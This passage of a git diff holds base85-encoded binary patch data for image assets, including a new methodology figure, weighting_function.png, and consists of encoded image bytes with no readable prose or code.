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
I5FSYS7xq&UP5=M^

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/weighting_function.png b/src/assets/methodology/weighting_function.png
new file mode 100644
index 0000000000000000000000000000000000000000..f2c957bcf5318d3b172427fcbf44b97c61ab1a1e
GIT binary patch
literal 35334
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
